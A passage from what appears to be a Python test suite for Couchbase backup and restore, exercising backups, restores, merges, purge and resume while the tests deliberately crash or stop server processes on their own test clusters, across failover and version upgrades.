2. Creates a backupset on the backup host
3. Initiates a backup - while backup is going on kills and restarts couchbase server
4. Validates backup output
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
backup_result = self.cluster.async_backup_cluster(cluster_host=self.backupset.cluster_host,
backup_host=self.backupset.backup_host,
directory=self.backupset.directory, name=self.backupset.name,
resume=self.backupset.resume, purge=self.backupset.purge,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(10)
conn = RemoteMachineShellConnection(self.backupset.cluster_host)
conn.stop_couchbase()
conn.start_couchbase()
conn.disconnect()
output = backup_result.result(timeout=200)
self.assertTrue(self._check_output("Backup successfully completed", output),
"Backup failed with couchbase stop and start within 180 seconds")
self.log.info("Backup succeeded with couchbase stop and start within 180 seconds")
def test_backup_with_memcached_crash_and_restart(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset on the backup host
3. Initiates a backup - while backup is going on kills and restarts memcached process
4. Validates backup output
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
backup_result = self.cluster.async_backup_cluster(
cluster_host=self.backupset.cluster_host,
backup_host=self.backupset.backup_host,
directory=self.backupset.directory,
name=self.backupset.name,
resume=self.backupset.resume,
purge=self.backupset.purge,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(10)
conn = RemoteMachineShellConnection(self.backupset.cluster_host)
conn.pause_memcached()
conn.unpause_memcached()
conn.disconnect()
output = backup_result.result(timeout=200)
self.assertTrue(self._check_output("Backup successfully completed", output),
"Backup failed with memcached crash and restart within 180 seconds")
self.log.info("Backup succeeded with memcached crash and restart within 180 seconds")
def test_backup_with_erlang_crash(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset on the backup host
3. Initiates a backup - while backup is going on kills erlang process
        4. Waits for 200s and validates the backup error
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
try:
backup_result = self.cluster.async_backup_cluster(
cluster_host=self.backupset.cluster_host,
backup_host=self.backupset.backup_host,
directory=self.backupset.directory,
name=self.backupset.name,
resume=self.backupset.resume,
purge=self.backupset.purge,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
if self.os_name != "windows":
self.sleep(10)
conn = RemoteMachineShellConnection(self.backupset.cluster_host)
conn.kill_erlang(self.os_name)
output = backup_result.result(timeout=200)
if self.debug_logs:
print "Raw output from backup run: ", output
error_mesgs = ["Error backing up cluster: Not all data was backed up due to",
"No connection could be made because the target machine actively refused it."]
error_found = False
for error in error_mesgs:
if self._check_output(error, output):
error_found = True
if not error_found:
                raise Exception("Expected error message not thrown by Backup 180 seconds after erlang crash")
except Exception as ex:
self.fail(str(ex))
finally:
conn.start_couchbase()
conn.disconnect()
self.sleep(30)
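    # --- Hedged sketch (not part of the original test suite) ---------------
    # Several crash tests scan the backup output for one of several possible
    # error messages, since the exact text differs by platform. A small
    # helper like this one could replace the repeated loop; it only relies
    # on the existing self._check_output helper.
    def _check_output_any(self, messages, output):
        """Return True if any candidate message appears in the output."""
        for message in messages:
            if self._check_output(message, output):
                return True
        return False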
def test_backup_with_couchbase_stop(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset on the backup host
3. Initiates a backup - while backup is going on kills couchbase server
        4. Waits for 200s and validates the backup error
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
try:
backup_result = self.cluster.async_backup_cluster(cluster_host=self.backupset.cluster_host,
backup_host=self.backupset.backup_host,
directory=self.backupset.directory,
name=self.backupset.name,
resume=self.backupset.resume, purge=self.backupset.purge,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(10)
conn = RemoteMachineShellConnection(self.backupset.cluster_host)
conn.stop_couchbase()
output = backup_result.result(timeout=200)
self.assertTrue(self._check_output(
"Error backing up cluster: Not all data was backed up due to connectivity issues.", output),
"Expected error message not thrown by Backup 180 seconds after couchbase-server stop")
self.log.info("Expected error message thrown by Backup 180 seconds after couchbase-server stop")
except Exception as ex:
self.fail(str(ex))
finally:
conn.start_couchbase()
conn.disconnect()
self.sleep(30)
def test_backup_with_memcached_crash(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset on the backup host
3. Initiates a backup - while backup is going on kills memcached process
        4. Waits for 200s and validates the backup error
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
try:
conn = RemoteMachineShellConnection(self.backupset.cluster_host)
conn.pause_memcached(self.os_name)
            self.sleep(17, "time needed for memcached process to stop completely")
backup_result = self.cluster.async_backup_cluster(
cluster_host=self.backupset.cluster_host,
backup_host=self.backupset.backup_host,
directory=self.backupset.directory,
name=self.backupset.name,
resume=self.backupset.resume,
purge=self.backupset.purge,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(10)
output = backup_result.result(timeout=200)
mesg = "Error backing up cluster: Unable to find the latest vbucket sequence numbers."
self.assertTrue(self._check_output(mesg, output),
"Expected error message not thrown by Backup 180 seconds after memcached crash")
self.log.info("Expected error thrown by Backup 180 seconds after memcached crash")
except Exception as ex:
self.fail(str(ex))
finally:
conn.unpause_memcached(self.os_name)
self.sleep(30)
conn.disconnect()
def test_restore_with_erlang_crash_and_restart(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
        2. Creates a backupset on the backup host and backs up data
3. Initiates a restore - while restore is going on kills and restarts erlang process
4. Validates restore output
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster()
rest_conn = RestConnection(self.backupset.restore_cluster_host)
rest_conn.create_bucket(bucket="default", ramQuotaMB=512)
restore_result = self.cluster.async_restore_cluster(
restore_host=self.backupset.restore_cluster_host,
backup_host=self.backupset.backup_host,
backups=self.backups, start=self.backupset.start,
end=self.backupset.end,
directory=self.backupset.directory,
name=self.backupset.name,
force_updates=self.backupset.force_updates,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(10)
conn = RemoteMachineShellConnection(self.backupset.restore_cluster_host)
conn.kill_erlang(self.os_name)
conn.start_couchbase()
conn.disconnect()
timeout_now = 400
if self.os_name == "windows":
timeout_now = 600
output = restore_result.result(timeout=timeout_now)
self.assertTrue(self._check_output("Restore completed successfully", output),
"Restore failed with erlang crash and restart within 180 seconds")
self.log.info("Restore succeeded with erlang crash and restart within 180 seconds")
def test_restore_with_couchbase_stop_and_start(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
        2. Creates a backupset on the backup host and backs up data
3. Initiates a restore - while restore is going on kills and restarts couchbase process
4. Validates restore output
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster()
rest_conn = RestConnection(self.backupset.restore_cluster_host)
rest_conn.create_bucket(bucket="default", ramQuotaMB=512)
restore_result = self.cluster.async_restore_cluster(
restore_host=self.backupset.restore_cluster_host,
backup_host=self.backupset.backup_host,
backups=self.backups, start=self.backupset.start,
end=self.backupset.end,
directory=self.backupset.directory,
name=self.backupset.name,
force_updates=self.backupset.force_updates,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(10)
conn = RemoteMachineShellConnection(self.backupset.restore_cluster_host)
conn.stop_couchbase()
self.sleep(10)
conn.start_couchbase()
conn.disconnect()
output = restore_result.result(timeout=500)
self.assertTrue(self._check_output("Restore completed successfully", output),
"Restore failed with couchbase stop and start within 180 seconds")
self.log.info("Restore succeeded with couchbase stop and start within 180 seconds")
def test_restore_with_memcached_crash_and_restart(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
        2. Creates a backupset on the backup host and backs up data
3. Initiates a restore - while restore is going on kills and restarts memcached process
4. Validates restore output
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster()
rest_conn = RestConnection(self.backupset.restore_cluster_host)
rest_conn.create_bucket(bucket="default", ramQuotaMB=512)
restore_result = self.cluster.async_restore_cluster(restore_host=self.backupset.restore_cluster_host,
backup_host=self.backupset.backup_host,
backups=self.backups, start=self.backupset.start,
end=self.backupset.end, directory=self.backupset.directory,
name=self.backupset.name,
force_updates=self.backupset.force_updates,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(10)
conn = RemoteMachineShellConnection(self.backupset.restore_cluster_host)
conn.pause_memcached(self.os_name)
conn.unpause_memcached(self.os_name)
conn.disconnect()
output = restore_result.result(timeout=600)
self.assertTrue(self._check_output("Restore completed successfully", output),
"Restore failed with memcached crash and restart within 400 seconds")
self.log.info("Restore succeeded with memcached crash and restart within 400 seconds")
def test_restore_with_erlang_crash(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
        2. Creates a backupset on the backup host and backs up data
        3. Initiates a restore - while restore is going on kills erlang process
        4. Waits for 200s and validates the restore output
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster()
rest_conn = RestConnection(self.backupset.restore_cluster_host)
rest_conn.create_bucket(bucket="default", ramQuotaMB=512)
try:
restore_result = self.cluster.async_restore_cluster(
restore_host=self.backupset.restore_cluster_host,
backup_host=self.backupset.backup_host,
backups=self.backups, start=self.backupset.start,
end=self.backupset.end,
directory=self.backupset.directory,
name=self.backupset.name,
force_updates=self.backupset.force_updates,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(10)
conn = RemoteMachineShellConnection(self.backupset.restore_cluster_host)
conn.kill_erlang(self.os_name)
output = restore_result.result(timeout=200)
self.assertTrue(self._check_output(
"Error restoring cluster: Not all data was sent to Couchbase", output),
"Expected error message not thrown by Restore 180 seconds after erlang crash")
self.log.info("Expected error thrown by Restore 180 seconds after erlang crash")
except Exception as ex:
self.fail(str(ex))
finally:
conn.start_couchbase()
conn.disconnect()
self.sleep(30)
def test_restore_with_couchbase_stop(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
        2. Creates a backupset on the backup host and backs up data
        3. Initiates a restore - while restore is going on kills couchbase server
        4. Waits for 200s and validates the restore output
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster()
rest_conn = RestConnection(self.backupset.restore_cluster_host)
rest_conn.create_bucket(bucket="default", ramQuotaMB=512)
try:
restore_result = self.cluster.async_restore_cluster(restore_host=self.backupset.restore_cluster_host,
backup_host=self.backupset.backup_host,
backups=self.backups, start=self.backupset.start,
end=self.backupset.end,
directory=self.backupset.directory,
name=self.backupset.name,
force_updates=self.backupset.force_updates,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(10)
conn = RemoteMachineShellConnection(self.backupset.restore_cluster_host)
conn.stop_couchbase()
output = restore_result.result(timeout=200)
self.assertTrue(self._check_output(
"Error restoring cluster: Not all data was sent to Couchbase due to connectivity issues.", output),
"Expected error message not thrown by Restore 180 seconds after couchbase-server stop")
self.log.info("Expected error message thrown by Restore 180 seconds after couchbase-server stop")
except Exception as ex:
self.fail(str(ex))
finally:
conn.start_couchbase()
conn.disconnect()
self.sleep(30)
def test_restore_with_memcached_crash(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
        2. Creates a backupset on the backup host and backs up data
        3. Initiates a restore - while restore is going on kills memcached process
        4. Waits for 200s and validates the restore output
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster()
rest_conn = RestConnection(self.backupset.restore_cluster_host)
rest_conn.create_bucket(bucket="default", ramQuotaMB=512)
try:
restore_result = self.cluster.async_restore_cluster(
restore_host=self.backupset.restore_cluster_host,
backup_host=self.backupset.backup_host,
backups=self.backups, start=self.backupset.start,
end=self.backupset.end,
directory=self.backupset.directory,
name=self.backupset.name,
force_updates=self.backupset.force_updates,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(10)
conn = RemoteMachineShellConnection(self.backupset.restore_cluster_host)
conn.pause_memcached(self.os_name)
output = restore_result.result(timeout=200)
self.assertTrue(self._check_output(
"Error restoring cluster: Not all data was sent to Couchbase", output),
"Expected error message not thrown by Restore 180 seconds after memcached crash")
self.log.info("Expected error thrown by Restore 180 seconds after memcached crash")
except Exception as ex:
self.fail(str(ex))
finally:
conn.unpause_memcached(self.os_name)
conn.disconnect()
self.sleep(30)
def test_backup_merge(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
        2. Takes specified number of backups (param number_of_backups - should be at least 2 for this test case)
3. Executes list command and validates if all backups are present
4. Randomly selects a start and end and merges the backups
        5. Executes list command again and validates that the newly merged set of backups is listed
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self._take_n_backups(n=self.backupset.number_of_backups)
status, output, message = self.backup_list()
if not status:
self.fail(message)
backup_count = 0
""" remove last 6 chars of offset time in backup name"""
        if self.backups and self.backups[0][-3:] == "_00":
            strip_backupset = [s[:-6] for s in self.backups]
        else:
            strip_backupset = list(self.backups)
for line in output:
if re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+", line):
backup_name = re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+", line).group()
if self.debug_logs:
print "backup name ", backup_name
print "backup set ", strip_backupset
if backup_name in strip_backupset:
backup_count += 1
self.log.info("{0} matched in list command output".format(backup_name))
self.assertEqual(backup_count, len(strip_backupset), "Initial number of backups did not match")
self.log.info("Initial number of backups matched")
self.backupset.start = randrange(1, self.backupset.number_of_backups)
self.backupset.end = randrange(self.backupset.start + 1, self.backupset.number_of_backups + 1)
status, output, message = self.backup_merge()
if not status:
self.fail(message)
status, output, message = self.backup_list()
if not status:
self.fail(message)
backup_count = 0
""" remove last 6 chars of offset time in backup name"""
        if self.backups and self.backups[0][-3:] == "_00":
            strip_backupset = [s[:-6] for s in self.backups]
        else:
            strip_backupset = list(self.backups)
for line in output:
if re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+", line):
backup_name = re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+", line).group()
if self.debug_logs:
print "backup name ", backup_name
print "backup set ", strip_backupset
if backup_name in strip_backupset:
backup_count += 1
self.log.info("{0} matched in list command output".format(backup_name))
self.assertEqual(backup_count, len(strip_backupset), "Merged number of backups did not match")
self.log.info("Merged number of backups matched")
def test_backup_merge_with_restore(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Takes two backups - restores from the backups and validates
3. Merges both the backups - restores from merged backup and validates
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self._take_n_backups(n=2)
self.backupset.start = 1
self.backupset.end = 2
output, error = self.backup_restore()
if error:
self.fail("Restoring backup failed: {0}".format(error))
self.log.info("Finished restoring backup before merging")
status, output, message = self.backup_merge()
if not status:
self.fail(message)
self.backupset.start = 1
self.backupset.end = 1
output, error = self.backup_restore()
if error:
self.fail("Restoring backup failed")
self.log.info("Finished restoring backup after merging")
def test_backup_merge_with_unmerged(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Takes two backups - merges them into one
3. Takes 2 more backups - merges the new backups with already merged ones and validates
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self._take_n_backups(n=2)
self.backupset.start = 1
self.backupset.end = 2
self.log.info("Merging existing incremental backups")
status, output, message = self.backup_merge()
if not status:
self.fail(message)
self.log.info("Taking more backups")
self._take_n_backups(n=2)
self.backupset.start = 1
self.backupset.end = 3
self.log.info("Merging new backups into already merged backup")
status, output, message = self.backup_merge()
if not status:
self.fail(message)
self.log.info("Successfully merged new backups with already merged backup")
def test_merge_backup_with_multi_threads(self):
"""
1. Create a cluster with default bucket
2. Load default bucket with key1
        3. Create a backup with the default single thread
        4. Load the bucket again with key2
        5. Create a backup with 2 threads
        6. Merge the backups. The merged backup should contain docs key1 and key2
"""
gen = BlobGenerator("ent-backup1", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.log.info("Start doing backup")
self.backup_create()
self.backup_cluster()
gen = BlobGenerator("ent-backup2", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_cluster(self.threads_count)
self.backupset.number_of_backups += 1
status, output, message = self.backup_list()
if not status:
self.fail(message)
self.log.info("Start to merge backup")
self.backupset.start = randrange(1, self.backupset.number_of_backups)
if int(self.backupset.number_of_backups) == 2:
self.backupset.end = 2
elif int(self.backupset.number_of_backups) > 2:
self.backupset.end = randrange(self.backupset.start,
self.backupset.number_of_backups + 1)
self.merged = True
status, output, _ = self.backup_merge()
self.backupset.end -= 1
status, output, message = self.backup_list()
if not status:
self.fail(message)
current_vseqno = self.get_vbucket_seqnos(self.cluster_to_backup, self.buckets,
self.skip_consistency, self.per_node)
self.log.info("*** Start to validate data in merge backup ")
self.validate_backup_data(self.backupset.backup_host, [self.master],
"ent-backup", False, False, "memory",
self.num_items, None)
self.backup_cluster_validate(skip_backup=True)
def test_backup_purge(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset
3. Initiates a backup and kills the erlang server while backup is going on
4. Waits for the backup command to timeout
5. Executes backup command again with purge option
        6. Validates that the old backup is deleted and a new backup is created successfully
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
old_backup_name = ""
new_backup_name = ""
backup_result = self.cluster.async_backup_cluster(cluster_host=self.backupset.cluster_host,
backup_host=self.backupset.backup_host,
directory=self.backupset.directory, name=self.backupset.name,
resume=self.backupset.resume, purge=self.backupset.purge,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(10)
conn = RemoteMachineShellConnection(self.backupset.cluster_host)
conn.kill_erlang()
output = backup_result.result(timeout=200)
self.log.info(str(output))
status, output, message = self.backup_list()
if not status:
self.fail(message)
for line in output:
if re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+-\d{2}_\d{2}", line):
old_backup_name = re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+-\d{2}_\d{2}", line).group()
self.log.info("Backup name before purge: " + old_backup_name)
conn.start_couchbase()
conn.disconnect()
self.sleep(30)
output, error = self.backup_cluster()
if error or not self._check_output("Backup successfully completed", output):
self.fail("Taking cluster backup failed.")
status, output, message = self.backup_list()
if not status:
self.fail(message)
for line in output:
if re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+-\d{2}_\d{2}", line):
new_backup_name = re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+-\d{2}_\d{2}", line).group()
self.log.info("Backup name after purge: " + new_backup_name)
self.assertNotEqual(old_backup_name, new_backup_name,
"Old backup name and new backup name are same when purge is used")
self.log.info("Old backup name and new backup name are not same when purge is used")
def test_backup_resume(self):
"""
1. Creates specified bucket on the cluster and loads it with given
number of items
2. Creates a backupset
3. Initiates a backup and kills the erlang server while backup is going on
4. Waits for the backup command to timeout
5. Executes backup command again with resume option
        6. Validates that the old backup is resumed and the backup is completed successfully
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
old_backup_name = ""
new_backup_name = ""
backup_result = self.cluster.async_backup_cluster(
cluster_host=self.backupset.cluster_host,
backup_host=self.backupset.backup_host,
directory=self.backupset.directory,
name=self.backupset.name,
resume=False,
purge=self.backupset.purge,
no_progress_bar=self.no_progress_bar,
cli_command_location=self.cli_command_location,
cb_version=self.cb_version)
self.sleep(3)
conn = RemoteMachineShellConnection(self.backupset.cluster_host)
conn.kill_erlang(self.os_name)
output = backup_result.result(timeout=200)
self.log.info(str(output))
status, output, message = self.backup_list()
if not status:
self.fail(message)
for line in output:
if re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+-\d{2}_\d{2}", line):
old_backup_name = re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}"
"_\d{2}.\d+-\d{2}_\d{2}", line).group()
self.log.info("Backup name before resume: " + old_backup_name)
conn.start_couchbase()
conn.disconnect()
self.sleep(30)
output, error = self.backup_cluster()
if error or not self._check_output("Backup successfully completed", output):
self.fail("Taking cluster backup failed.")
status, output, message = self.backup_list()
if not status:
self.fail(message)
for line in output:
if re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+-\d{2}_\d{2}", line):
new_backup_name = re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}"
"_\d{2}.\d+-\d{2}_\d{2}", line).group()
self.log.info("Backup name after resume: " + new_backup_name)
self.assertEqual(old_backup_name, new_backup_name,
"Old backup name and new backup name are not same when resume is used")
self.log.info("Old backup name and new backup name are same when resume is used")
def test_backup_restore_with_deletes(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
        2. Creates a backupset - backs up data and validates
        3. Performs deletes
        4. Restores data and validates
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster_validate()
self._load_all_buckets(self.master, gen, "delete", 0)
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
def test_backup_restore_with_failover(self):
"""
1. Test should be run with 2 nodes in cluster host (param: nodes_init = 2)
2. Creates specified bucket on the cluster and loads it with given number of items
        3. Creates a backupset - backs up data and validates
4. Fails over the second node with specified type (param: graceful = True | False)
5. Sets recovery type to specified value (param: recoveryType = full | delta)
6. Adds back the failed over node and rebalances
7. Restores data and validates
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster_validate()
rest = RestConnection(self.backupset.cluster_host)
nodes_all = rest.node_statuses()
for node in nodes_all:
if node.ip == self.servers[1].ip:
rest.fail_over(otpNode=node.id, graceful=self.graceful)
self.sleep(30)
rest.set_recovery_type(otpNode=node.id, recoveryType=self.recoveryType)
rest.add_back_node(otpNode=node.id)
rebalance = self.cluster.async_rebalance(self.servers, [], [])
rebalance.result()
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
def test_backup_restore_after_offline_upgrade(self):
"""
        1. Test has to be supplied initial_version to be installed; creates
           default bucket and loads data into this bucket.
        2. Backs up the cluster, verifies data and deletes the default bucket
        3. Upgrades the cluster to upgrade_version and re-creates the default bucket
4. Restores data and validates
"""
upgrade_version = self.input.param("upgrade_version", "5.0.0-3330")
if upgrade_version == "5.0.0-3330":
self.fail("\n *** Need param 'upgrade_version=' to run")
self._install(self.servers)
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size,
end=self.num_items)
rebalance = self.cluster.async_rebalance(self.servers[:2], [self.servers[1]],
[])
rebalance.result()
RestConnection(self.master).create_bucket(bucket='default', ramQuotaMB=512)
self.buckets = RestConnection(self.master).get_buckets()
self.total_buckets = len(self.buckets)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster_validate()
self.sleep(5)
BucketOperationHelper.delete_bucket_or_assert(self.master, "default", self)
""" Start to upgrade """
if self.force_version_upgrade:
upgrade_version = self.force_version_upgrade
upgrade_threads = self._async_update(upgrade_version=upgrade_version,
servers=self.servers[:2])
for th in upgrade_threads:
th.join()
self.log.info("Upgraded to: {ver}".format(ver=upgrade_version))
self.sleep(30)
""" Re-create default bucket on upgrade cluster """
RestConnection(self.master).create_bucket(bucket='default', ramQuotaMB=512)
self.sleep(5)
""" Only server from Spock needs build in user
to access bucket and other tasks
"""
print "************** cb version: ", RestConnection(self.master).get_nodes_version()[:1]
if "5" <= RestConnection(self.master).get_nodes_version()[:1]:
self.add_built_in_server_user()
for user in self.users_check_restore:
user_name = user.replace('[', '_').replace(']', '_')
testuser = [{'id': user_name, 'name': user_name,
'password': 'password'}]
rolelist = [{'id': user_name, 'name': user_name,
'roles': user}]
self.log.info("**** add built-in '%s' user to node %s ****" % (testuser[0]["name"],
self.master.ip))
RbacBase().create_user_source(testuser, 'builtin', self.master)
self.log.info("**** add '%s' role to '%s' user ****" % (rolelist[0]["roles"],
testuser[0]["name"]))
RbacBase().add_user_role(rolelist, RestConnection(self.master), 'builtin')
backupsets = [self.backupset]
if "5" <= RestConnection(self.master).get_nodes_version()[:1]:
for user in self.users_check_restore:
new_backupset = copy.deepcopy(self.backupset)
new_backupset.restore_cluster_host_username = user.replace('[', '_').replace(']', '_')
backupsets.append(new_backupset)
for backupset in backupsets:
self.backupset = backupset
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
BucketOperationHelper().delete_bucket_or_assert(self.backupset.cluster_host,
"default", self)
def test_backup_restore_after_online_upgrade(self):
"""
        1. Test has to be supplied initial_version to install and
           upgrade_version to upgrade to
2. Installs initial_version on the servers
3. Load data and backup in pre-upgrade
4. Install upgrade version on 2 nodes. Use swap rebalance to upgrade
cluster
        5. Performs operations after the cluster upgrade
6. Restores data and validates
"""
servers = copy.deepcopy(self.servers)
self.vbuckets = self.initial_vbuckets
if len(servers) != 4:
self.fail("\nThis test needs exactly 4 nodes to run! ")
self._install(servers)
self.sleep(5, "wait for node ready")
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size,
end=self.num_items)
rebalance = self.cluster.async_rebalance(servers[:self.nodes_init],
[servers[int(self.nodes_init) - 1]], [])
rebalance.result()
self.sleep(15)
rest = RestConnection(self.master)
rest.create_bucket(bucket='default', ramQuotaMB=512)
self.buckets = rest.get_buckets()
self._load_all_buckets(self.master, gen, "create", 0)
cb_version = rest.get_nodes_version()
initial_compression_mode = "off"
if cb_version[:5] in COUCHBASE_FROM_4DOT6:
self.cluster_flag = "--cluster"
""" create index """
if 5.5 > float(cb_version[:3]):
self.compression_mode = initial_compression_mode
if self.create_gsi:
if "5" > rest.get_nodes_version()[:1]:
if self.gsi_type == "forestdb":
self.fail("Need to set param self.gsi_type=memory_optimized")
rest.set_indexer_storage_mode(storageMode="memory_optimized")
else:
rest.set_indexer_storage_mode(storageMode="plasma")
self.create_indexes()
self.backup_create()
if self.backupset.number_of_backups > 1:
self.log.info("Start doing multiple backup")
for i in range(1, self.backupset.number_of_backups + 1):
self._backup_restore_with_ops()
else:
self.backup_cluster_validate()
start = randrange(1, self.backupset.number_of_backups + 1)
if start == self.backupset.number_of_backups:
end = start
else:
end = randrange(start, self.backupset.number_of_backups + 1)
self.sleep(5)
self.backup_list()
""" Start to online upgrade using swap rebalance """
self.initial_version = self.upgrade_versions[0]
if self.force_version_upgrade:
self.initial_version = self.force_version_upgrade
self.sleep(self.sleep_time,
"Pre-setup of old version is done. Wait for online upgrade to: "
"{0} version".format(self.initial_version))
self.product = 'couchbase-server'
self._install(servers[2:])
self.sleep(self.sleep_time,
"Installation of new version is done. Wait for rebalance")
self.log.info(
"Rebalanced in upgraded nodes and rebalanced out nodes with old version")
add_node_services = [self.add_node_services]
if "-" in self.add_node_services:
add_node_services = self.add_node_services.split("-")
self.cluster.rebalance(servers, servers[2:], servers[:2],
services=add_node_services)
self.sleep(15)
self.backupset.cluster_host = servers[2]
""" Upgrade is done """
self.log.info("** Upgrade is done **")
healthy = False
timeout = 0
while not healthy:
healthy = RestHelper(RestConnection(self.backupset.cluster_host)).is_cluster_healthy()
if not healthy:
if timeout == 120:
self.fail("Node %s is not ready after 2 mins" % self.backupset.cluster_host)
else:
self.sleep(5, "Wait for server up ")
timeout += 5
else:
healthy = True
if "5" <= RestConnection(servers[2]).get_nodes_version()[:1]:
for user in self.users_check_restore:
user_name = user.replace('[', '_').replace(']', '_')
testuser = [{'id': user_name, 'name': user_name,
'password': 'password'}]
rolelist = [{'id': user_name, 'name': user_name,
'roles': user}]
self.log.info("**** add built-in '%s' user to node %s ****" % (testuser[0]["name"],
servers[2].ip))
RbacBase().create_user_source(testuser, 'builtin', servers[2])
self.sleep(10)
self.log.info("**** add '%s' role to '%s' user ****" % (rolelist[0]["roles"],
testuser[0]["name"]))
status = RbacBase().add_user_role(rolelist, RestConnection(servers[2]), 'builtin')
self.log.info(status)
if self.backupset.number_of_backups_after_upgrade:
self.backupset.number_of_backups += \
self.backupset.number_of_backups_after_upgrade
if "5" <= RestConnection(servers[2]).get_nodes_version()[:1]:
